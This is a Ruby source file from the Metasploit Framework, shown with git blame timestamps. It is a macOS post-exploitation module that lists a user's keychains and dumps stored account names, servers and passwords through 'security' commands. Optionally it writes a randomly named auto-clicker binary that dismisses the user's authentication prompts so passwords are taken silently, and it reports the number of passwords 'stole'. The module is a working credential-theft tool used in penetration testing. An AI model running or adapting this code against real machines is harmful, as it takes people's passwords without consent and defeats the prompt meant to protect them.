metasploit-framework/modules/post/osx/gather/enum_keychain.rb

161 lines
4.8 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Post
2012-08-08 15:40:33 +00:00
2015-09-08 02:13:27 +00:00
include Msf::Post::OSX::System
include Msf::Exploit::FileDropper
2013-09-05 18:41:25 +00:00
def initialize(info={})
super(update_info(info,
'Name' => 'OS X Gather Keychain Enumeration',
'Description' => %q{
This module presents a way to quickly go through the current user's keychains and
collect data such as email accounts, servers, and other services. Please note:
2015-09-08 02:13:27 +00:00
when using the GETPASS and GETPASS_AUTO_ACCEPT option, the user may see an authentication
alert flash briefly on their screen that gets dismissed by a programatically triggered click.
2013-09-05 18:41:25 +00:00
},
'License' => MSF_LICENSE,
2015-09-08 02:13:27 +00:00
'Author' => [ 'ipwnstuff <e[at]ipwnstuff.com>', 'joev' ],
2013-09-05 18:41:25 +00:00
'Platform' => [ 'osx' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
2013-09-05 18:41:25 +00:00
))
register_options(
[
2015-09-08 02:13:27 +00:00
OptBool.new('GETPASS', [false, 'Collect passwords.', false]),
OptBool.new('GETPASS_AUTO_ACCEPT', [false, 'Attempt to auto-accept any prompts when collecting passwords.', true]),
OptInt.new('GETPASS_TIMEOUT', [false, 'Maximum time to wait on all passwords to be dumped.', 999999]),
OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
2013-09-05 18:41:25 +00:00
], self.class)
end
def list_keychains
2015-06-22 19:30:46 +00:00
keychains = cmd_exec("security list")
user = cmd_exec("whoami")
2013-09-05 18:41:25 +00:00
print_status("The following keychains for #{user.strip} were found:")
print_line(keychains.chomp)
return keychains =~ /No such file or directory/ ? nil : keychains
end
def enum_accounts(keychains)
2015-06-22 19:30:46 +00:00
user = cmd_exec("whoami").chomp
out = cmd_exec("security dump | egrep 'acct|desc|srvr|svce'")
2013-09-05 18:41:25 +00:00
2015-09-08 02:13:27 +00:00
accounts = []
2013-09-05 18:41:25 +00:00
out.split("\n").each do |line|
unless line =~ /NULL/
case line
when /\"acct\"/
2015-09-08 02:13:27 +00:00
accounts << Hash.new
accounts.last["acct"] = line.split('<blob>=')[1].split('"')[1]
2013-09-05 18:41:25 +00:00
when /\"srvr\"/
2015-09-08 02:13:27 +00:00
accounts.last["srvr"] = line.split('<blob>=')[1].split('"')[1]
2013-09-05 18:41:25 +00:00
when /\"svce\"/
2015-09-08 02:13:27 +00:00
accounts.last["svce"] = line.split('<blob>=')[1].split('"')[1]
2013-09-05 18:41:25 +00:00
when /\"desc\"/
2015-09-08 02:13:27 +00:00
accounts.last["desc"] = line.split('<blob>=')[1].split('"')[1]
2013-09-05 18:41:25 +00:00
end
end
end
2015-09-08 02:13:27 +00:00
accounts
2013-09-05 18:41:25 +00:00
end
def get_passwords(accounts)
(1..accounts.count).each do |num|
if accounts[num].has_key?("srvr")
c = 'find-internet-password'
s = accounts[num]["srvr"]
else
c = 'find-generic-password'
s = accounts[num]["svce"]
end
2015-06-22 19:30:46 +00:00
cmd = cmd_exec("security #{c} -ga \"#{accounts[num]["acct"]}\" -s \"#{s}\" 2>&1")
2013-09-05 18:41:25 +00:00
cmd.split("\n").each do |line|
if line =~ /password: /
unless line.split()[1].nil?
accounts[num]["pass"] = line.split()[1].gsub("\"","")
else
accounts[num]["pass"] = nil
end
end
end
end
return accounts
end
2015-09-08 02:13:27 +00:00
def save(data, kind='Keychain information')
2013-09-05 18:41:25 +00:00
l = store_loot('macosx.keychain.info',
'plain/text',
session,
data,
'keychain_info.txt',
'Mac Keychain Account/Server/Service/Description')
2015-09-08 02:13:27 +00:00
print_good("#{@peer} - #{kind} saved in #{l}")
2013-09-05 18:41:25 +00:00
end
def run
@peer = "#{session.session_host}:#{session.session_port}"
keychains = list_keychains
if keychains.nil?
print_error("#{@peer} - Module timed out, no keychains found.")
return
end
2015-06-22 19:30:46 +00:00
user = cmd_exec("/usr/bin/whoami").chomp
2013-09-05 18:41:25 +00:00
accounts = enum_accounts(keychains)
save(accounts)
if datastore['GETPASS']
2015-09-08 02:13:27 +00:00
if (datastore['GETPASS_AUTO_ACCEPT'])
print_status("Writing auto-clicker to `#{clicker_file}'")
write_file(clicker_file, clicker_bin)
register_file_for_cleanup(clicker_file)
print_status('Dumping keychain with auto-clicker...')
passwords = cmd_exec("chmod +x #{clicker_file} && #{clicker_file}", nil, datastore['GETPASS_TIMEOUT'])
save(passwords, 'Plaintext passwords')
begin
count = JSON.parse(passwords).count
print_good("Successfully stole #{count} passwords")
rescue JSON::ParserError => e
print_error("Response was not valid JSON")
end
else
begin
passwords = get_passwords(accounts)
rescue
print_error("#{@peer} - Module timed out, no passwords found.")
print_error("#{@peer} - This is likely due to the host not responding to the prompt.")
end
save(passwords)
2013-09-05 18:41:25 +00:00
end
end
end
2012-08-08 15:40:33 +00:00
2015-09-08 02:13:27 +00:00
def clicker_file
@clicker_file ||=
"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
end
def clicker_bin
File.read(File.join(
Msf::Config.data_directory, 'exploits', 'osx', 'dump_keychain', 'dump'
))
end
2012-08-08 15:40:33 +00:00
end